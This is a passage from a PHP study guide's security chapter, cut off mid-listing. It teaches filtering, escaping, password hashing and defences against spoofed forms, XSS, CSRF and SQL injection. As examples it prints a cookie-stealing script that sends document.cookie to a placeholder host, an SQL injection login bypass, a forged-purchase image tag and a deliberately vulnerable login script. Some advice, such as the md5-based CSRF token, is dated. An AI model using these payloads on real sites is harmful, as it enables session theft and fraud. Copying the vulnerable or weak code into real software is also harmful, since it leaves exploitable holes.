Security - Zend PHP 5 Certification Study Guide (2014)

Security

Ben Parker once advised his young nephew Peter, whose superhero alter ego is Spider-Man, that “with great power comes great responsibility.” So it is with security in PHP applications. PHP provides a rich toolset with immense power (perhaps too much power, some have argued), and this power, when used with careful attention to detail, allows for the creation of complex, robust applications. Without attention to detail, though, malicious users can turn PHP’s power to their advantage, attacking applications in a variety of ways. This chapter examines some of these attack vectors, providing you with the means to mitigate and even eliminate most attacks.

It is important to understand that this chapter does not provide an exhaustive coverage of all the security topics PHP developers must be aware of. This is, as we mentioned in the foreword, true of all chapters in this book, but we think it’s worth a reminder here because of the potentially serious consequences of security-related bugs.

Concepts and Practices

Before analyzing specific attacks and how to protect against them, it is necessary to have a grasp of some basic principles of Web application security. These principles are not difficult to understand, but they require a particular mindset about data: simply put, a security-conscious mindset assumes that all data received in input is tainted and must be filtered before use and escaped when leaving the application. Understanding and practicing these concepts is essential to ensure the security of your applications.

The main thing to remember is FIEO: Filter Input, Escape Output.

All Input is Tainted

Perhaps the most important concept in any transaction is that of trust. Do you trust the data being processed? Can you? The answer is easy if you know the origin of the data. But if the data originates from a foreign source, such as user form input, a query string, or even an RSS feed, it cannot be trusted. It is tainted data.

Data from these sources—and many others—is tainted because you cannot be certain that it does not contain characters that might be executed in the wrong context. For example, a query string value might contain data that was manipulated by a user to include Javascript that, when echoed to a web browser, will have harmful consequences.

As a general rule of thumb, the data in all of PHP’s superglobal arrays should be considered tainted. This is because either all or some of the data provided in the superglobal arrays comes from an external source. Even the $_SERVER array is not fully safe, because it contains some data provided by the client. The one exception to this rule is the $_SESSION array, which is persisted on the server and never transmitted over the Internet.

Furthermore, data from any external source, for example a web service, should also be treated as input, even though it is fetched rather than pushed by the user.

Before processing tainted data, it is important to filter it. The data is only safe to use once it is filtered. There are two approaches to filtering data: the whitelist approach and the blacklist approach.

Whitelist vs. Blacklist Filtering

Two common approaches to filtering input are whitelist filtering and blacklist filtering. Blacklist filtering is the less restrictive approach; it assumes the programmer knows everything that should not be allowed to pass through. For example, some forums filter profanity using a blacklist approach. There is a specific set of words that are considered inappropriate for that forum, and these words are filtered out. Any word that is not in that list is allowed. Thus, it is necessary to add new words to the list from time to time, as moderators see fit. This example may not directly correlate to the specific problems faced by programmers attempting to mitigate attacks, but there is an inherent problem in blacklist filtering that is evident here: blacklists must be continually modified and expanded as new attack vectors become apparent.

Whitelist filtering is much more restrictive, but it affords the programmer the ability to accept only expected inputs. Instead of identifying data that is unacceptable, a whitelist identifies the data that is acceptable. Any inputs not on the whitelist will be rejected. This is information you already have when developing an application; it may change in the future, but you maintain control over the parameters that change and are not left to the whims of would-be attackers. Since you control what data you accept, attackers are unable to pass any inputs other than what your whitelist allows. For this reason, whitelists afford stronger protection against attacks than blacklists do.
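The difference between the two approaches can be sketched in a few lines. The function names blacklist_filter() and whitelist_filter() are illustrative only and are not part of PHP; the blacklist removes one known-bad string, while the whitelist accepts only values from a fixed set.

```php
<?php
// Hypothetical blacklist filter: strips one known-bad substring.
function blacklist_filter($value)
{
    return str_replace('<script>', '', $value);
}

// Hypothetical whitelist filter: returns the value only if it is expected,
// otherwise null.
function whitelist_filter($value, array $allowed)
{
    return in_array($value, $allowed, true) ? $value : null;
}

// The blacklist is defeated by nesting the forbidden string inside itself,
// because str_replace() does not rescan its own output.
$bypassed = blacklist_filter('<scr<script>ipt>');

// The whitelist rejects anything that is not explicitly allowed.
$accepted = whitelist_filter('Red', array('Red', 'Blue'));
$rejected = whitelist_filter('<scr<script>ipt>', array('Red', 'Blue'));
```

Here $bypassed still contains a script tag after filtering, while $rejected is null: the attacker has to guess a value on the list rather than find a gap in it.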

Validation

Since all input is tainted and cannot be trusted, you must validate your input to ensure that it is what you expect. To do this, we use validation, or a whitelist approach. As an example, consider the following HTML form:

Listing 13.1: A sample HTML form

<form method="POST">

Username: <input type="text" name="username">

<br>

Password: <input type="text" name="password">

<br>

Favourite colour:

<select name="colour">

<option>Red</option>

<option>Blue</option>

<option>Yellow</option>

<option>Green</option>

</select>

<br>

<input type="submit">

</form>

This form contains three input elements: username, password, and colour. For this example, username should contain only alphabetic characters, password should contain only alphanumeric characters, and colour should contain any of “Red,” “Blue,” “Yellow,” or “Green.” It is possible to implement client-side validation code using JavaScript to enforce these rules, but, as described later in the section on spoofed forms, it is not always possible to force users to use only your form and, thus, your client-side rules. Therefore, while client-side validation is important for usability, server-side filtering is important for security.

To filter the input received from this form, start by initializing a blank array. It is important to use a name that sets this array apart as containing only filtered data; in this example, we use $clean. Then, later in your code, when you encounter the variable $clean['username'], you can be certain that this value has been filtered. If, however, you see $_POST['username'], you cannot be certain that the data is trustworthy. Discard these variables and use the ones from the $clean array instead.

Validation can take one of two forms; the first is comparison against known good values, and the second is confirmation of content.

To perform comparisons against known good values, we typically define an array of possible inputs and check for the presence of the input value within it. For confirmation of content, we can use ctype_* functions such as ctype_alpha() and ctype_digit().

The following code example shows one way to filter the input for this form:

Listing 13.2: Filtering form input

$clean = array();

if (ctype_alpha($_POST['username'])) {

$clean['username'] = $_POST['username'];

}

if (ctype_alnum($_POST['password'])) {

$clean['password'] = $_POST['password'];

}

$colours = array('Red', 'Blue', 'Yellow', 'Green');

if (in_array($_POST['colour'], $colours)) {

$clean['colour'] = $_POST['colour'];

}

Filtering with the validation approach places the control firmly in your hands and ensures that your application will not receive bad data. If, for example, someone tries to pass to the processing script a username or colour that is not allowed, the worst that can happen is that the $clean array will not contain a value for username or colour. If username is required, then simply display an error message to the user asking him or her to provide correct data. You should force the user to provide correct information rather than trying to sanitize it on your own. If you attempt to sanitize the data, you may end up with bad data, and you’ll run into the same problems that arise with the use of blacklists.
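One way to combine the filtering step with error reporting is sketched below. The helper name validate_signup() and its return shape are assumptions made for illustration; the isset() and is_string() guards are additions that cope with fields that are missing or submitted as arrays.

```php
<?php
// Hypothetical helper: validates the sample form and reports which
// fields were rejected. Returns array($clean, $errors).
function validate_signup(array $post)
{
    $clean   = array();
    $errors  = array();
    $colours = array('Red', 'Blue', 'Yellow', 'Green');

    // isset() guards against missing keys; is_string() rejects arrays
    // submitted as username[]=...
    if (isset($post['username']) && is_string($post['username'])
        && ctype_alpha($post['username'])) {
        $clean['username'] = $post['username'];
    } else {
        $errors[] = 'username';
    }

    if (isset($post['password']) && is_string($post['password'])
        && ctype_alnum($post['password'])) {
        $clean['password'] = $post['password'];
    } else {
        $errors[] = 'password';
    }

    // Strict comparison against the list of known good values.
    if (isset($post['colour']) && in_array($post['colour'], $colours, true)) {
        $clean['colour'] = $post['colour'];
    } else {
        $errors[] = 'colour';
    }

    return array($clean, $errors);
}

list($clean, $errors) = validate_signup(array(
    'username' => 'alice',
    'password' => 'abc123',
    'colour'   => 'Purple',
));
```

In this run $errors names only the colour field, so the script can ask the user to correct that one value instead of trying to repair it.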

Escape Output

Output is anything that leaves your application bound for a client. The client, in this case, is anything from a Web browser to a database server, and just as you should filter all incoming data, you should escape all outbound data. Whereas filtering input protects your application from bad or harmful data, escaping output protects the client and user from potentially damaging commands.

Escaping output should not be regarded as part of the filtering process, however. These two steps, while equally important, serve distinct purposes. Filtering ensures the validity of data coming into the application; escaping protects you and your users from potentially harmful attacks. Output must be escaped because clients—Web browsers, database servers, and so on—often take action when encountering special characters. For Web browsers, these special characters form HTML tags; for database servers, they may include quotation marks and SQL keywords. We will look at these attacks later in the chapter.

Therefore, it is necessary to know the intended destination of output and to escape the data accordingly. Escaping output intended for a database will not work when sent to a web browser. Since most PHP applications deal primarily with the Web and databases, this section will focus on escaping output for these mediums, but you should always be aware of the destination of your output, and any special characters or commands that destination may accept and act upon, and be ready to escape those characters or commands appropriately.

To escape output intended for a web browser, PHP provides htmlspecialchars() and htmlentities(), the latter being the more exhaustive and, therefore, the recommended function for escaping. The following code example illustrates the use of htmlentities() to prepare output for sending to the browser. Another concept illustrated is the use of an array specifically designed to store output. If you prepare output by escaping it and storing it to a specific array, you can then use the contents of the array without worrying about whether the output has been escaped. A variable in your script that is being outputted and is not part of this array should be regarded suspiciously. This practice will help make your code easier to read and maintain. For this example, assume that the value for $user_message comes from a database result set.

$html = array();

$html['message'] = htmlentities(

$user_message, ENT_QUOTES, 'UTF-8'

);

echo $html['message'];
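The difference between the two functions is easiest to see side by side. The following sketch uses a made-up input string containing markup, both quote styles, and one non-ASCII character (written as UTF-8 bytes so the example does not depend on the file's encoding).

```php
<?php
// Illustrative input: an HTML tag with an event handler and the word "café".
$raw = "<b onclick=\"x('y')\">caf\xC3\xA9</b>";

// Converts only the characters that are special in HTML: & < > " '
$special = htmlspecialchars($raw, ENT_QUOTES, 'UTF-8');

// Additionally converts every character that has a named HTML entity.
$entities = htmlentities($raw, ENT_QUOTES, 'UTF-8');

echo $special, "\n";
echo $entities, "\n";
```

Both results are free of raw angle brackets and quotes; only htmlentities() also rewrites the accented character as an entity.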

Escape output intended for a database server, such as in an SQL statement, with the database-driver-specific *_escape_string() function; when possible, use prepared statements. Since PHP 5.1 includes PHP Data Objects (PDO), you may use prepared statements for all database engines for which there is a PDO driver. If the database engine does not natively support prepared statements, then PDO emulates this feature transparently for you.

The use of prepared statements allows you to specify placeholders in an SQL statement. This statement can then be used multiple times throughout an application, substituting new values for the placeholders each time. The database engine (or PDO, if it is emulating prepared statements) performs the hard work of actually escaping the values for use in the statement. The Database Programming chapter contains more information on prepared statements, but the following code provides a simple example for binding parameters to a prepared statement.

Listing 13.3: Using prepared statements to escape values

// First, filter the input

$clean = array();

if (ctype_alpha($_POST['username'])) {

$clean['username'] = $_POST['username'];

// Set a named placeholder in the SQL statement

$sql = 'SELECT * FROM users WHERE username = :username';

// Assume the handler exists; prepare the statement

$stmt = $dbh->prepare($sql);

// Create our data mapping

$data = [':username' => $clean['username']];

// Execute and fetch results

$stmt->execute($data);

$results = $stmt->fetchAll();

}

Filtering

Another option is filtering. Filtering is both validation and sanitization of input. Validation confirms that the input is what we expect, while sanitization will clean a string by either escaping or removing offending parts. Often we want to do both.

PHP 5.2 added a new filter extension that allows much more control over validation, as well as the ability to do some common escaping. For example, the filter extension allows us to define not only that we want a string, but also that the string should be an email address or a URL.

The filter extension provides two primary functions. The first is filter_input(), which is recommended for working explicitly with input via $_GET, $_POST, $_COOKIE, $_SERVER, and $_ENV. This allows you to easily search through your code for unfiltered input. The filter_input() function accepts four arguments:

1. The type of input, which is one of the constants

· INPUT_GET

· INPUT_POST

· INPUT_COOKIE

· INPUT_SERVER

· INPUT_ENV

2. The variable name, which is what would be the array key of the superglobal array

3. The filter to apply

4. Filter options

The second function is filter_var(), which will filter any variable (or constant expression), including those in the superglobal arrays (although choosing to filter individual values and expressions will make verifying security more difficult). This is very similar to filter_input() except that it only takes three arguments:

1. The value to filter

2. The filter to apply

3. Filter options

There are two types of filters that can be applied, validation and sanitizing. You can also define a callback. A full list of filters and options can be found in Appendix B.

All filters are defined by a constant; validation filters are named FILTER_VALIDATE_* and sanitizing filters are named FILTER_SANITIZE_*. Flags, appropriately, are named FILTER_FLAG_*.

All filters return the—potentially sanitized—value, or false on failure. This can be tricky when validating booleans using FILTER_VALIDATE_BOOLEAN, as it will also return false when the input is false. To get around this, the flag FILTER_NULL_ON_FAILURE will return null on failure rather than false.
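The boolean case can be illustrated with filter_var(). The input strings below are arbitrary examples: "no" is a value the boolean filter recognizes as false, while "maybe" is not a boolean at all.

```php
<?php
// Without the flag, a valid "false" and an invalid value both yield false.
$no    = filter_var('no', FILTER_VALIDATE_BOOLEAN);
$maybe = filter_var('maybe', FILTER_VALIDATE_BOOLEAN);

// With FILTER_NULL_ON_FAILURE, invalid input is reported as null instead,
// so the two cases can be told apart with a strict comparison.
$noFlagged    = filter_var('no', FILTER_VALIDATE_BOOLEAN, FILTER_NULL_ON_FAILURE);
$maybeFlagged = filter_var('maybe', FILTER_VALIDATE_BOOLEAN, FILTER_NULL_ON_FAILURE);

var_dump($no, $maybe, $noFlagged, $maybeFlagged);
```

When using the flag, compare the result with === null rather than testing it loosely, since both false and null are falsy.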

Using these functions is simple. Here is what it might look like to filter our form from earlier:

Listing 13.4: Using filter_* to validate and sanitize data

// First, filter the input

$clean = array();

// Validate that it contains only letters

$username = filter_input(

INPUT_POST,

'username',

FILTER_VALIDATE_REGEXP,

['options' =>

['regexp' => '/^[a-z]+$/i']

]

);

// If validation failed, $username will be false

if ($username) {

$clean['username'] = $username;

} else {

// Validation failed, prepare the input for re-output to

// the user in HTML

$clean['username'] = filter_input(

INPUT_POST, 'username', FILTER_SANITIZE_SPECIAL_CHARS

);

}

The filter extension is the recommended way to handle input.

You can also filter multiple values in one go using filter_input_array() and filter_var_array().

If we want to strip tags from all POST values, or maybe a row of data from our database, we can do so very simply:

$clean = filter_input_array(

INPUT_POST, FILTER_SANITIZE_STRING

);

// or

$clean = filter_var_array($row, FILTER_SANITIZE_STRING);

We can also specify different filters for each input value:

Listing 13.5: Specifying different filters

$clean = filter_input_array(

INPUT_POST,

[

'email' => FILTER_VALIDATE_EMAIL,

'blog' => FILTER_VALIDATE_URL,

'age' => [

'filter' => FILTER_VALIDATE_INT,

'options' => ['min_range' => 18]

]

]);

Be aware that FILTER_VALIDATE_URL only allows ASCII domains; internationalized domain names (IDN) must first be converted to punycode using idn_to_ascii(). Additionally, a valid URL does not necessarily mean that it uses the HTTP scheme; you should validate the scheme using parse_url().
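A scheme check along these lines might look like the following sketch. The helper name is_web_url() is hypothetical, and the decision to accept only http and https is an assumption about what the application wants.

```php
<?php
// Hypothetical helper: accepts only syntactically valid http/https URLs.
function is_web_url($url)
{
    // First confirm that the value is a well-formed URL at all.
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return false;
    }

    // Then compare the scheme against a whitelist.
    $scheme = parse_url($url, PHP_URL_SCHEME);

    return in_array(strtolower((string) $scheme), array('http', 'https'), true);
}

$blog = is_web_url('http://example.org/blog');
$ftp  = is_web_url('ftp://example.org/file');
$junk = is_web_url('not a url');
```

The ftp URL passes FILTER_VALIDATE_URL on its own, which is why the second step is needed.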

PHP 5.4 also introduced an additional argument to both functions, add_empty, which when set to true will add keys missing from the input array to the result array with a value of NULL.
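The effect of add_empty can be seen with filter_var_array() and an input array that lacks one of the expected keys. The field names here are examples only.

```php
<?php
// The input has an email address but no age.
$input = array('email' => 'user@example.org');

$definition = array(
    'email' => FILTER_VALIDATE_EMAIL,
    'age'   => FILTER_VALIDATE_INT,
);

// add_empty = true: the missing key appears in the result as NULL.
$withEmpty = filter_var_array($input, $definition, true);

// add_empty = false: the missing key is simply absent from the result.
$withoutEmpty = filter_var_array($input, $definition, false);

var_dump($withEmpty, $withoutEmpty);
```

With add_empty enabled, every expected key can be read without an isset() check; with it disabled, array_key_exists() distinguishes a field that was never submitted from one that was submitted and failed validation.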

Register Globals

As of PHP 5.3 register_globals has been deprecated, and it was removed entirely in PHP 5.4.

Password Security

With PHP 5.5, a new, simple password-hashing API was added to help ensure that best practices are used by everyone. The password-hashing API currently promotes bcrypt one-way hashing as the best algorithm; it is far superior to MD5, and even SHA-1.

Hashing Passwords

Hashing a password is as simple as calling the password_hash() function with the string to hash and the algorithm to use:

$hashed = password_hash("password", PASSWORD_BCRYPT);

echo $hashed;

Which produces output similar to:

$2y$10$zEsiam6Y6rlCGqGgS3lrve8FaeWruKJY3ElaeQUJRhEyhWOQ7ySqO

As you can see, we pass in the PASSWORD_BCRYPT constant to choose the bcrypt algorithm. While this is currently the only algorithm, the API was built under the assumption that it would either be improved upon with a different algorithm or compromised. The API provides simple mechanisms for ensuring your passwords are kept up to date.

It is also possible to pass extra options to password_hash() by passing an associative array as the third argument. These options are:

· salt — You may provide a custom salt which will override the automatically generated salts. This is not recommended.

· cost — The cost denotes the algorithmic cost that should be used—the higher this number, the slower, and the better your security. The default is 10. You should be aiming for a hash time of between one-half and one second.

$hashed = password_hash(

"password", PASSWORD_BCRYPT, ['cost' => 12]

);

echo $hashed;

Displays something similar to the following:

$2y$12$AGzXqsGLuHSXhW4nCzC6NeZauf.hrWoBJpNn/Q4pr9phL0BNvMIOa

Verifying Passwords

To verify a password, we use the password_verify() function. This is even simpler than hashing the password. It takes the user input, and the saved hash, and returns a boolean. This is possible because the resulting hash from password_hash() includes the algorithm, cost, and salt.

// Assume $hashed contains the originally stored password

if (password_verify($_POST['password'], $hashed)) {

// Password is valid

}
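To see what the hash carries with it, password_get_info() can be used to inspect one. This is a small sketch with a made-up password; the cost of 10 is passed explicitly so that the reported value is predictable.

```php
<?php
$hashed = password_hash('correct horse', PASSWORD_BCRYPT, array('cost' => 10));

// Reports the algorithm and options encoded in the hash string.
$info = password_get_info($hashed);

// No salt or cost needs to be supplied when verifying: both are read
// from the stored hash.
$valid   = password_verify('correct horse', $hashed);
$invalid = password_verify('wrong guess', $hashed);

echo $info['algoName'], ' cost=', $info['options']['cost'], "\n";
```

Because everything needed for verification is stored in the one string, a single database column is enough to hold it.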

Forward Compatibility

As computing hardware gets faster, hashing algorithms become more susceptible to brute force attacks. Additionally, flaws can be found in the algorithm that render it insecure.

To help with this, the API also provides the password_needs_rehash() function. This function takes the hashed password as its first argument, and then, as with password_hash(), the algorithm and (optional) options as its second and third arguments.

To further ease this process, PHP provides a PASSWORD_DEFAULT constant, that is set to the current recommended algorithm. This means that when you create a password, it uses the most up-to-date option every time. This is possible because password_verify() uses the algorithm indicated in the hash itself.

By combining this function with your verification process, you can automatically update your users’ passwords when new algorithms become available.

Listing 13.6: Upgrading user password transparently

// Assume $hashed contains the originally stored password

if (password_verify($_POST['password'], $hashed)) {

// Password is valid

if (password_needs_rehash($hashed, PASSWORD_DEFAULT)) {

$newhash = password_hash(

$_POST['password'], PASSWORD_DEFAULT

);

// Store the $newhash

}

}

This can allow you to upgrade your users in place without inconveniencing them with a mass password reset. After a set period of time, say 30 days, you can reset the passwords of users whose stored hashes password_needs_rehash() still flags as outdated, to migrate inactive users and ensure security.
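The same check also reacts to changed options, not only to a changed algorithm. The sketch below assumes a hash originally created with a cost of 10 and an application that later raises the cost to 11; both numbers are arbitrary.

```php
<?php
// A hash created under the old settings.
$old = password_hash('secret', PASSWORD_BCRYPT, array('cost' => 10));

// Same algorithm and cost: nothing to do.
$sameCost = password_needs_rehash($old, PASSWORD_BCRYPT, array('cost' => 10));

// Raised cost: the stored hash is flagged for upgrade at next login.
$higherCost = password_needs_rehash($old, PASSWORD_BCRYPT, array('cost' => 11));

var_dump($sameCost, $higherCost);
```

Passing the same options array to password_needs_rehash() and password_hash() keeps the two calls in agreement about what counts as current.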

Website Security

Website security refers to the security of the elements of a website through which an attacker can interface with your application. These vulnerable points of entry include forms and URLs, which are the most likely candidates for a potential attack. Thus, it is important to focus on these elements and learn how to protect against the improper use of your forms and URLs. Proper input filtering and output escaping will mitigate most of these risks.

Spoofed Forms

A common method used by attackers is a spoofed form submission. There are various ways to spoof forms, the easiest of which is to simply copy a target form and execute it from a different location. Spoofing a form makes it possible for an attacker to remove all client-side restrictions imposed upon the form, allowing any and all manner of data to be submitted to your application. Consider the following form:

Listing 13.7: Form with maxlength restrictions

<form method="POST" action="process.php">

<p>

Street: <input type="text" name="street"

maxlength="100">

</p>

<p>

City: <input type="text" name="city" maxlength="50">

</p>

<p>

State:

<select name="state">

<option value="">Pick a state...</option>

<option value="AL">Alabama</option>

<option value="AK">Alaska</option>

<option value="AZ">Arizona</option>

<!-- options continue for all 50 states -->

</select>

</p>

<p>

Zip: <input type="text" name="zip" maxlength="5">

</p>

<p>

<input type="submit">

</p>

</form>

This form uses the maxlength attribute to restrict the length of content entered into the fields. There may also be some JavaScript validation that tests these restrictions before submitting the form to process.php. In addition, the select field contains a set list of values, as defined by the form. It’s a common mistake to assume that these are the only values that the form can submit. However, it is possible to reproduce this form at another location and submit it by modifying the action to use an absolute URL. Consider the following version of the same form:

Listing 13.8: Tampered form without maxlength restrictions

<form method="POST" action="http://example.org/process.php">

<p>

Street: <input type="text" name="street">

</p>

<p>

City: <input type="text" name="city">

</p>

<p>

State: <input type="text" name="state">

</p>

<p>

Zip: <input type="text" name="zip">

</p>

<p>

<input type="submit">

</p>

</form>

In this version of the form, all client-side restrictions have been removed, and the user may enter any data, which will then be sent to http://example.org/process.php, the original processing script for the form.

As you can see, spoofing a form submission is very easy, and it is also virtually impossible to protect against. You may have noticed, though, that it is possible to check the Referer header, available as $_SERVER['HTTP_REFERER']. While this may provide some protection against an attacker who simply copies the form and runs it from another location, even a moderately crafty hacker will be able to circumvent it fairly easily. Suffice it to say that, since the Referer header is sent by the client, it is easy to manipulate, and its expected value is always apparent: process.php will expect the referring URL to be that of the original form page.

Despite the fact that spoofed form submissions are hard to prevent, it is not necessary to deny data submitted from sources other than your forms. It is necessary, however, to ensure that all input plays by your rules. This reiterates the importance of filtering all input. Do not rely upon client-side validation techniques. Filtering input ensures that all data conforms to a list of acceptable values, and spoofed forms will not be able to get around server-side filtering rules.
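Server-side rules for the address form could be sketched as follows. The function name filter_address() is hypothetical, the state list is truncated to three entries for brevity, and the length limits mirror the maxlength attributes of the original form.

```php
<?php
// Hypothetical server-side filter for the address form.
function filter_address(array $post)
{
    $states = array('AL', 'AK', 'AZ'); // truncated; a real list has all states
    $limits = array('street' => 100, 'city' => 50);
    $clean  = array();

    // Enforce the same length limits the form's maxlength attributes suggest.
    // strlen() counts bytes; mb_strlen() may suit multibyte input better.
    foreach ($limits as $field => $max) {
        if (isset($post[$field]) && is_string($post[$field])
            && $post[$field] !== '' && strlen($post[$field]) <= $max) {
            $clean[$field] = $post[$field];
        }
    }

    // The state must be one of the values the select element offers.
    if (isset($post['state']) && in_array($post['state'], $states, true)) {
        $clean['state'] = $post['state'];
    }

    // The zip code must be exactly five digits.
    if (isset($post['zip']) && is_string($post['zip'])
        && strlen($post['zip']) === 5 && ctype_digit($post['zip'])) {
        $clean['zip'] = $post['zip'];
    }

    return $clean;
}

// Data as a spoofed form without client-side limits might submit it.
$spoofed = array(
    'street' => str_repeat('A', 500),
    'city'   => 'Springfield',
    'state'  => 'XX',
    'zip'    => '12345; DROP',
);
$clean = filter_address($spoofed);
```

Only the city survives here. The street and city are checked for length only, so they still need to be escaped for whatever destination they are later sent to.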

Cross-Site Scripting

Cross-site scripting (XSS) is one of the most common and best known kinds of attacks. The simplicity of this attack and the number of vulnerable applications in existence make it very attractive to malicious users. An XSS attack exploits the user’s trust in the application; it is usually an effort to steal user information, such as cookies and other personally identifiable data. All applications that display input are at risk.

Consider the following form, for example. This form might exist on any of a number of popular community websites; it allows a user to add a comment to another user’s profile. After submitting a comment, the page displays all of the comments that have been submitted so that everyone can view all of the comments left on the user’s profile.

Listing 13.9: Simple comment form

<form method="POST" action="process.php">

<p>Add a comment:</p>

<p>

<textarea name="comment"></textarea>

</p>

<p>

<input type="submit">

</p>

</form>

Imagine that a malicious user submits a comment on someone’s profile that includes the following content and it is displayed without escaping:

<script>

document.location =

'http://example.org/getcookies.php?cookies='

+ document.cookie;

</script>

Now, everyone visiting this user’s profile will be redirected to the given URL and their cookies (including personally identifiable information and login information) will be appended to the query string. The attacker can easily access the cookies with $_GET['cookies'] and store them for later use. However, this attack works only if the application fails to escape output. Thus, it is easy to prevent with proper output escaping.
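As a minimal sketch of that escaping step, the helper below renders stored comments for an HTML page. The name render_comments() is illustrative, and the comments are passed in as an array rather than read from a database.

```php
<?php
// Hypothetical rendering helper: escapes each stored comment for HTML output.
function render_comments(array $comments)
{
    $html = '';
    foreach ($comments as $comment) {
        $html .= '<p>' . htmlentities($comment, ENT_QUOTES, 'UTF-8') . "</p>\n";
    }

    return $html;
}

// The malicious comment from the example above, on a single line.
$payload = "<script>document.location = "
    . "'http://example.org/getcookies.php?cookies=' + document.cookie;</script>";

$output = render_comments(array('Nice profile!', $payload));

echo $output;
```

The browser now displays the script as text instead of executing it, because the angle brackets arrive as &lt; and &gt;.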

Cross-Site Request Forgeries

A cross-site request forgery (CSRF) is an attack that attempts to cause a victim to send arbitrary HTTP requests, usually to URLs requiring privileged access, using the victim’s existing session to gain access. The HTTP request then causes the victim to execute a particular action based on his or her level of privilege, such as making a purchase or modifying or removing information.

Whereas an XSS attack exploits the user’s trust in an application, a forged request exploits an application’s trust in a user, since the request appears to be legitimate and it is difficult for the application to determine whether the user intended for it to take place. While proper escaping of output will prevent your application from being used as the vehicle for a CSRF attack, it will not prevent your application from receiving forged requests. Thus, your application must be able to determine whether the request was intentional and legitimate or possibly forged and malicious.

Before examining the means to protect against forged requests, it may be helpful to understand how such an attack occurs. Consider the following example.

Suppose you have a website at which users register for an account and then browse a catalogue of books for purchase. Suppose that a malicious user signs up for an account and proceeds through the process of purchasing a book from the site. Along the way, she might learn the following through casual observation:

· She must log in to make a purchase.

· After selecting a book for purchase, she clicks the buy button, which redirects her through checkout.php.

· She sees that the action to checkout.php is a POST action but wonders whether passing parameters to checkout.php through the query string (GET) will work.

· When passing the same form values through the query string (i.e. checkout.php?isbn=0312863551&qty=1), she notices that she has, in fact, successfully purchased a book.

With this knowledge, the malicious user can cause others to make purchases at your site without their knowledge. The easiest way to do this is to use an image tag to embed an image in some arbitrary Web site other than your own (although, at times, your own site may be used for such an attack). In the following code, the src of the img tag makes a request when the page loads.

<img src="http://example.org/checkout.php?isbn=0312863551&qty=1" />

Even though this img tag is embedded on a different website, it still continues to make the request to the book catalogue site. For most people, the request will fail because users must be logged in to make a purchase, but for those users who do happen to be logged into the site (through a cookie or an active session), this attack exploits the website’s trust in that user and initiates a purchase. The solution for this particular type of attack, however, is simple: force the use of POST over GET. This attack works because checkout.php uses the $_REQUEST superglobal array to access isbn and qty.

Using $_POST will mitigate the risk of this kind of attack, but it won’t protect against all forged requests. Other, more sophisticated attacks can make POST requests just as easily as GET. A simple token method can block these attempts and force users to use your forms. The token method involves the use of a randomly generated token that is stored in the user’s session when the user accesses the form page and is also placed in a hidden field on the form. The processing script checks the token value from the posted form against the value in the user’s session. If it matches, then the request is valid. If it does not match or is missing, then the request is suspect. The script should not process the input and should instead display an error to the user. The following snippet from the aforementioned form illustrates the use of the token method:

Listing 13.10: Setting a token to prevent CSRF

<?php

session_start();

$token = md5(uniqid(rand(), TRUE));

$_SESSION['token'] = $token;

?>

<form action="checkout.php" method="POST">

<input type="hidden" name="token"

value="<?php echo $token; ?>">

<!-- Remainder of form -->

</form>

The processing script that handles this form (checkout.php) can then check for the token:

Listing 13.11: Validating CSRF token

// ensure token is set and that the value submitted

// by the client matches the value in the user's session

if (isset($_SESSION['token'])

&& isset($_POST['token'])

&& $_POST['token'] === $_SESSION['token'])

{

// Token is valid, continue processing form data

}
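A possible hardening of the token method is sketched below. It assumes PHP 7 or later for random_bytes() and PHP 5.6 or later for hash_equals(), neither of which is part of the PHP versions this chapter otherwise targets. The helper names are hypothetical, and the session and POST data are passed in as arrays so the logic can be exercised without a running session.

```php
<?php
// Assumption: PHP 7+ (random_bytes) and PHP 5.6+ (hash_equals).

// Hypothetical helper: returns a 64-character hexadecimal token drawn
// from a cryptographically secure source.
function csrf_generate_token()
{
    return bin2hex(random_bytes(32));
}

// Hypothetical helper: compares the submitted token with the session
// token in constant time.
function csrf_token_is_valid(array $session, array $post)
{
    if (!isset($session['token'], $post['token'])
        || !is_string($session['token']) || !is_string($post['token'])) {
        return false;
    }

    return hash_equals($session['token'], $post['token']);
}

$token   = csrf_generate_token();
$match   = csrf_token_is_valid(array('token' => $token), array('token' => $token));
$forged  = csrf_token_is_valid(array('token' => $token), array('token' => 'guess'));
$missing = csrf_token_is_valid(array('token' => $token), array());
```

In a real script the two arrays would be $_SESSION and $_POST, and the generated token would be stored in the session and written into the hidden form field as in the listing above.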

Database Security

When using a database and accepting input to create part of a database query, it is easy to fall victim to an SQL injection attack. SQL injection occurs when a malicious user experiments on a form or (worse) URL query string to gain information about a database. After gaining sufficient knowledge—usually from database error messages—the attacker can exploit any possible vulnerabilities in the form by injecting SQL into form fields. A popular example is a simple user login form:

Listing 13.12: Sample login form

<form method="POST" action="login.php">

Username: <input type="text" name="username" />

<br />

Password: <input type="password" name="password" />

<br />

<input type="submit" value="Log In" />

</form>

The vulnerable code used to process this login form might look like this:

Listing 13.13: Vulnerable login script

$username = $_POST['username'];

$password = password_hash(

$_POST['password'], PASSWORD_DEFAULT

);

$sql = "SELECT *

FROM users

WHERE username = '{$username}' AND

password = '{$password}'";

/* database connection and query code */

if (count($results) > 0) {

// Successful login attempt

}

In this example, note there is no code to filter the $_POST input. Instead, the raw input is stored directly to the $username variable. This raw input is then used in the SQL statement—nothing is escaped. An attacker might attempt to log in using a username similar to the following:

username' OR 1 = 1 --

With this username and a blank password, the SQL statement is now:

SELECT *

FROM users

WHERE

username = 'username' OR 1 = 1 --' AND

password = '$2y$10$.vGA1O9wmRjrwAVXD98HNOgsNpDczlqm3Jq7KnEd1rVAGv3Fykk1a'

Since 1 = 1 is always true and -- begins an SQL comment, the SQL query ignores everything after the -- and successfully returns all user records. This is enough to log in the attacker. Furthermore, if the attacker knows a username, he can provide that username in an attempt to impersonate the user and gain that user’s access credentials.

SQL injection attacks are made possible by a lack of filtering and escaping. To properly protect your application, use bound parameters with prepared statements. For more information on bound parameters, see the Escape Output section earlier in this chapter or the Database Programming chapter. If you can’t use prepared statements and must escape the data manually, use either PDO::quote() or the driver-specific *_escape_string() function for your database.
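As a minimal sketch of the prepared-statement approach, the following script rebuilds the login check with a bound parameter and password_verify(). It assumes the pdo_sqlite extension is available and uses an in-memory database purely for illustration; the users table layout, the sample user alice, and the check_login() function name are all invented for this example.

```php
<?php
// Assumption: an in-memory SQLite database stands in for the real one.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)');

// Store a sample user with a salted hash, never the plain password.
$insert = $pdo->prepare(
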